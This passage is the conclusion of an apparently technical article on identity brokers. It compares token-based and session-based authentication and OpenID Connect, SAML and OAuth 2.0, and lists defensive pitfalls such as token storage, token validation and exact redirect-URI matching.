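Every attack URI passes the substring check and fails the exact match, while the registered callback still passes the strict check.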
Conclusion
Identity brokers centralize authentication in distributed systems, providing single sign-on, protocol translation, and unified identity management. However, implementation choices significantly impact security, performance, and user experience.
The choice between token-based and session-based authentication involves fundamental trade-offs. Token-based authentication offers stateless scalability and microservices compatibility but struggles with revocation and security risks. Session-based authentication provides immediate revocation and fine-grained control but introduces scalability complexity. The hybrid approach using short-lived access tokens with server-side refresh tokens represents industry best practices, balancing security, performance, and user experience.
Protocol selection depends on your environment and requirements. OpenID Connect is the modern standard for new applications, offering simple integration, mobile support, and purpose-built authentication. SAML remains essential for enterprise integration and legacy systems despite its complexity. OAuth 2.0 serves authorization needs but requires OpenID Connect for proper authentication.
Common pitfalls plague identity broker implementations. Storing tokens in local storage creates XSS vulnerabilities; use HTTP-only cookies instead. Missing token validation allows attackers to forge tokens, so always verify signatures, expiration, audience, and issuer. Weak redirect URI validation enables authorization code theft; use exact matching against registered URIs.
Identity brokers are essential infrastructure for modern distributed systems, but they require careful implementation. Understanding the trade-offs between authentication approaches, choosing appropriate protocols, and avoiding common security pitfalls ensures your identity broker enhances rather than undermines your security posture. The complexity is justified by the benefits: unified authentication, improved user experience, and centralized security controls across your entire application ecosystem.